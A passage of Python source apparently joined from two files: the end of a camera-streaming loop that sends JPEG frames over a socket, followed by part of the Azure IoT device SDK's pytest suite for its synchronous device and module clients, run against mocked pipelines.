encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 70]
print('Start streaming')
while True:
try:
stamps, image = inP.recv()
result, image = cv2.imencode('.jpg', image, encode_param)
data = image.tobytes()
size = len(data)
self.connection.write(struct.pack("<L",size))
self.connection.write(data)
except Exception as e:
print("CameraStreamer failed to stream images:",e,"\n")
# Reinitialize the socket for reconnecting to client.
self.connection = None
self._init_socket()
pass
|
test_sync_clients.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import logging
import threading
import time
import os
import io
import six
from azure.iot.device.iothub import IoTHubDeviceClient, IoTHubModuleClient
from azure.iot.device import exceptions as client_exceptions
from azure.iot.device.iothub.pipeline import IoTHubPipeline, constant, config
from azure.iot.device.iothub.pipeline import exceptions as pipeline_exceptions
from azure.iot.device.iothub.models import Message, MethodRequest
from azure.iot.device.iothub.sync_inbox import SyncClientInbox
from azure.iot.device.iothub.auth import IoTEdgeError
logging.basicConfig(level=logging.DEBUG)
# automatically mock the iothub pipeline for all tests in this file.
@pytest.fixture(autouse=True)
def mock_pipeline_init(mocker):
return mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline")
# automatically mock the http pipeline for all tests in this file.
@pytest.fixture(autouse=True)
def mock_pipeline_http_init(mocker):
return mocker.patch("azure.iot.device.iothub.pipeline.HTTPPipeline")
################
# SHARED TESTS #
################
class SharedClientInstantiationTests(object):
@pytest.mark.it(
"Stores the IoTHubPipeline from the 'iothub_pipeline' parameter in the '_iothub_pipeline' attribute"
)
def test_iothub_pipeline_attribute(self, client_class, iothub_pipeline, http_pipeline):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline is iothub_pipeline
@pytest.mark.it(
"Stores the HTTPPipeline from the 'http_pipeline' parameter in the '_http_pipeline' attribute"
)
def test_sets_http_pipeline_attribute(self, client_class, iothub_pipeline, http_pipeline):
client = client_class(iothub_pipeline, http_pipeline)
assert client._http_pipeline is http_pipeline
@pytest.mark.it("Sets on_connected handler in the IoTHubPipeline")
def test_sets_on_connected_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_connected is not None
assert client._iothub_pipeline.on_connected == client._on_connected
@pytest.mark.it("Sets on_disconnected handler in the IoTHubPipeline")
def test_sets_on_disconnected_handler_in_pipeline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_disconnected is not None
assert client._iothub_pipeline.on_disconnected == client._on_disconnected
@pytest.mark.it("Sets on_method_request_received handler in the IoTHubPipeline")
def test_sets_on_method_request_received_handler_in_pipleline(
self, client_class, iothub_pipeline, http_pipeline
):
client = client_class(iothub_pipeline, http_pipeline)
assert client._iothub_pipeline.on_method_request_received is not None
assert (
client._iothub_pipeline.on_method_request_received
== client._inbox_manager.route_method_request
)
class ConfigurationSharedClientCreateFromConnectionStringTests(object):
@pytest.mark.it("Sets all configuration options to default when no user configuration provided")
def test_pipeline_configuration_defaults(
self, mocker, mock_pipeline_init, client_class, connection_string
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
args = (connection_string,)
client_class.create_from_connection_string(*args)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call()
assert mock_pipeline_init.call_args[0][1].websockets is False
assert mock_pipeline_init.call_args[0][1].product_info == ""
@pytest.mark.it("Sets all valid configuration options to the user supplied values")
@pytest.mark.parametrize(
"websockets, product_info",
[
pytest.param((None, None), (None, None), id=" Setting to None"),
pytest.param(
(True, True),
("__fake_product_info__", "__fake_product_info__"),
id=" Expected Values",
),
],
)
def test_pipeline_configuration(
self, mocker, mock_pipeline_init, client_class, connection_string, websockets, product_info
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig",
wraps=config.IoTHubPipelineConfig,
)
args = (connection_string,)
kwargs = {"websockets": websockets[0], "product_info": product_info[0]}
client_class.create_from_connection_string(*args, **kwargs)
assert mock_config_init.call_count == 1
assert mock_config_init.call_args == mocker.call(
websockets=websockets[0], product_info=product_info[0]
)
assert mock_pipeline_init.call_args[0][1].websockets == websockets[1]
assert mock_pipeline_init.call_args[0][1].product_info == product_info[1]
@pytest.mark.it("Throws if invalid configuration option is provided")
def test_pipeline_configuration_fails_with_bad_option(
self, mocker, mock_pipeline_init, client_class, connection_string
):
mocker.patch("azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider")
args = (connection_string,)
kwargs = {"bad_option": "__fake_parameter__"}
with pytest.raises(TypeError):
client_class.create_from_connection_string(*args, **kwargs)
class SharedClientCreateFromConnectionStringTests(object):
@pytest.mark.it(
"Uses the connection string and CA certificate combination to create a SymmetricKeyAuthenticationProvider"
)
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_auth_provider_creation(self, mocker, client_class, connection_string, ca_cert):
mock_auth_parse = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client_class.create_from_connection_string(*args, **kwargs)
assert mock_auth_parse.call_count == 1
assert mock_auth_parse.call_args == mocker.call(connection_string)
assert mock_auth_parse.return_value.ca_cert is ca_cert
@pytest.mark.it("Uses the SymmetricKeyAuthenticationProvider to create an IoTHubPipeline")
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_pipeline_creation(
self, mocker, client_class, connection_string, ca_cert, mock_pipeline_init
):
mock_auth = mocker.patch(
"azure.iot.device.iothub.auth.SymmetricKeyAuthenticationProvider"
).parse.return_value
mock_config_init = mocker.patch(
"azure.iot.device.iothub.abstract_clients.IoTHubPipelineConfig"
)
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client_class.create_from_connection_string(*args, **kwargs)
assert mock_pipeline_init.call_count == 1
assert mock_pipeline_init.call_args == mocker.call(mock_auth, mock_config_init.return_value)
@pytest.mark.it("Uses the IoTHubPipeline to instantiate the client")
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_client_instantiation(self, mocker, client_class, connection_string, ca_cert):
mock_pipeline = mocker.patch("azure.iot.device.iothub.pipeline.IoTHubPipeline").return_value
mock_pipeline_http = mocker.patch(
"azure.iot.device.iothub.pipeline.HTTPPipeline"
).return_value
spy_init = mocker.spy(client_class, "__init__")
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client_class.create_from_connection_string(*args, **kwargs)
assert spy_init.call_count == 1
assert spy_init.call_args == mocker.call(mocker.ANY, mock_pipeline, mock_pipeline_http)
@pytest.mark.it("Returns the instantiated client")
@pytest.mark.parametrize(
"ca_cert",
[
pytest.param(None, id=" No CA certificate"),
pytest.param("some-certificate", id=" With CA certificate"),
],
)
def test_returns_client(self, client_class, connection_string, ca_cert):
args = (connection_string,)
kwargs = {}
if ca_cert:
kwargs["ca_cert"] = ca_cert
client = client_class.create_from_connection_string(*args, **kwargs)
assert isinstance(client, client_class)
# TODO: If auth package was refactored to use ConnectionString class, tests from that
# class would increase the coverage here.
@pytest.mark.it("Raises ValueError when given an invalid connection string")
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param(object(), id="Non-string input"),
pytest.param(
"HostName=Invalid;DeviceId=Invalid;SharedAccessKey=Invalid",
id="Malformed Connection String",
marks=pytest.mark.xfail(reason="Bug in pipeline + need for auth refactor"), # TODO
),
],
)
def test_raises_value_error_on_bad_connection_string(self, client_class, bad_cs):
with pytest.raises(ValueError):
client_class.create_from_connection_string(bad_cs)
class WaitsForEventCompletion(object):
def add_event_completion_checks(self, mocker, pipeline_function, args=[], kwargs={}):
event_init_mock = mocker.patch.object(threading, "Event")
event_mock = event_init_mock.return_value
def check_callback_completes_event():
# Assert exactly one Event was instantiated so we know the following asserts
# are related to the code under test ONLY
assert event_init_mock.call_count == 1
# Assert waiting for Event to complete
assert event_mock.wait.call_count == 1
assert event_mock.set.call_count == 0
# Manually trigger callback
cb = pipeline_function.call_args[1]["callback"]
cb(*args, **kwargs)
# Assert Event is now completed
assert event_mock.set.call_count == 1
event_mock.wait.side_effect = check_callback_completes_event
class SharedClientConnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'connect' pipeline operation")
def test_calls_pipeline_connect(self, client, iothub_pipeline):
client.connect()
assert iothub_pipeline.connect.call_count == 1
@pytest.mark.it("Waits for the completion of the 'connect' pipeline operation before returning")
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.connect
)
client_manual_cb.connect()
@pytest.mark.it(
"Raises a client error if the `connect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.connect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.connect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'disconnect' pipeline operation")
def test_calls_pipeline_disconnect(self, client, iothub_pipeline):
client.disconnect()
assert iothub_pipeline.disconnect.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'disconnect' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.disconnect
)
client_manual_cb.disconnect()
@pytest.mark.it(
"Raises a client error if the `disconnect` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.disconnect,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.disconnect()
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientDisconnectEventTests(object):
@pytest.mark.it("Clears all pending MethodRequests upon disconnect")
def test_state_change_handler_clears_method_request_inboxes_on_disconnect(self, client, mocker):
clear_method_request_spy = mocker.spy(client._inbox_manager, "clear_all_method_requests")
client._on_disconnected()
assert clear_method_request_spy.call_count == 1
class SharedClientSendD2CMessageTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_message' IoTHubPipeline operation")
def test_calls_pipeline_send_message(self, client, iothub_pipeline, message):
client.send_message(message)
assert iothub_pipeline.send_message.call_count == 1
assert iothub_pipeline.send_message.call_args[0][0] is message
@pytest.mark.it(
"Waits for the completion of the 'send_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.send_message
)
client_manual_cb.send_message(message)
@pytest.mark.it(
"Raises a client error if the `send_message` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.send_message,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message(message)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in a Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_wraps_data_in_message_and_calls_pipeline_send_message(
self, client, iothub_pipeline, message_input
):
client.send_message(message_input)
assert iothub_pipeline.send_message.call_count == 1
sent_message = iothub_pipeline.send_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get") # patch this receive_method_request won't block
# Verify Input Messaging enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Method Requests will appear disabled
client.receive_method_request(method_name)
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.METHODS
iothub_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_method_request(method_name)
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox._put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, iothub_pipeline, method_response):
client.send_method_response(method_response)
assert iothub_pipeline.send_method_response.call_count == 1
assert iothub_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=iothub_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, iothub_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(iothub_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin will appear disabled
client.get_twin()
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.TWIN
iothub_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, iothub_pipeline):
client.get_twin()
assert iothub_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline, twin_patch_reported
):
# patch this so x_get_twin won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
iothub_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.TWIN
iothub_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, iothub_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert iothub_pipeline.patch_twin_reported_properties.call_count == 1
assert (
iothub_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, iothub_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.patch_twin_reported_properties,
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
iothub_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=iothub_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(
self, mocker, client, iothub_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin patches will appear disabled
client.receive_twin_desired_properties_patch()
assert iothub_pipeline.enable_feature.call_count == 1
assert iothub_pipeline.enable_feature.call_args[0][0] == constant.TWIN_PATCHES
iothub_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
iothub_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_twin_desired_properties_patch()
assert iothub_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox._put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
